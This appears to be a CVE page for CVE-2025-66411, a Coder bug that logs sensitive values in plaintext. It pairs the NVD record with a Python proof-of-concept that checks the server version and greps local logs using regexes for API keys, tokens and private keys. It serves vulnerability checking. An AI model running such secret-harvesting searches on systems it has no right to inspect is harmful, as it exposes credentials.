CVE-2025-66411

# CVE-2025-66411 PoC - Sensitive Information Log Disclosure # This PoC demonstrates how to check for exposed sensitive information in Coder logs import requests import json import subprocess import re def check_coder_version(coder_url): """Check Coder server version""" try: response = requests.get(f"{coder_url}/api/v2/version", timeout=10) if response.status_code == 200: return response.json().get('version', '') except: return None def check_vulnerable_versions(version): """Check if version is vulnerable""" if not version: return None # Parse version number match = re.match(r'(\d+)\.(\d+)\.(\d+)', version) if not match: return None major, minor, patch = int(match.group(1)), int(match.group(2)), int(match.group(3)) # Check vulnerable versions if major == 2: if minor == 26 and patch < 5: return True elif minor == 27 and patch < 7: return True elif minor == 28 and patch < 4: return True return False def search_logs_for_secrets(log_locations): """Search log files for sensitive information patterns""" sensitive_patterns = [ r'(?i)(api[_-]?key|token|secret|password|credential)["\']?\s*[:=]\s*["\'][^"\']+["\']', r'-----BEGIN (RSA |EC )?PRIVATE KEY-----', r'aws_access_key_id', r'ghp_[a-zA-Z0-9]{36}', r'gho_[a-zA-Z0-9]{36}', r'sk-[a-zA-Z0-9]{48}' ] findings = [] for log_path in log_locations: try: result = subprocess.run(['grep', '-r', '-E', '|'.join(sensitive_patterns), log_path], capture_output=True, text=True, timeout=30) if result.stdout: findings.append({'log': log_path, 'matches': result.stdout}) except: pass return findings def main(): coder_url = input("Enter Coder server URL: ") version = check_coder_version(coder_url) if not version: print("[-] Could not determine Coder version") return print(f"[+] Coder version: {version}") if check_vulnerable_versions(version): print("[!] This version is VULNERABLE to CVE-2025-66411") print("[+] Checking for sensitive information in logs...") log_locations = [ '/var/log/coder/*.log', '/var/log/containers/*.log', '/var/log/pods/*/workspace-agent/*.log' ] findings = search_logs_for_secrets(log_locations) if findings: print(f"[CRITICAL] Found {len(findings)} potential exposures:") for finding in findings: print(f"\n{finding['log']}:") print(finding['matches']) else: print("[+] No obvious secrets found in checked locations") else: print("[+] Version is NOT vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66411", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:26.727", "lastModified": "2026-02-13T16:09:09.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4."}, {"lang": "es", "value": "Coder permite a las organizaciones aprovisionar entornos de desarrollo remotos a través de Terraform. En versiones anteriores a 2.26.5, 2.27.7 y 2.28.4, los manifiestos del Agente de Espacio de Trabajo que contenían valores sensibles se registraban en texto plano sin depurar. Un atacante con acceso local limitado al Espacio de Trabajo de Coder (VM, Pod de K8s, etc.) o a un sistema de terceros (SIEM, pila de registro) podría acceder a esos registros. Esta vulnerabilidad está corregida en 2.26.5, 2.27.7 y 2.28.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:*", "versionEndExcluding": "2.26.5", "matchCriteriaId": "485831F1-651C-46F8-BEB4-91EC0DD8E284"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:*", "versionStartIncluding": "2.27.0", "versionEndExcluding": "2.27.7", "matchCriteriaId": "F2601993-8C91-426B-9A52-833FAA97D45C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coder:coder:*:*:*:*:*:go:*:*", "versionStartIncluding": "2.28.0", "versionEndExcluding": "2.28.4", "matchCriteriaId": "5C8EFC89-B911-4AC4-B805-017148C0C8FE"}]}]}], "references": [{"url": "https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/coder/coder/releases/tag/v2.26.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/coder/coder/releases/tag/v2.27.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/coder/coder/releases/tag/v2.28.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}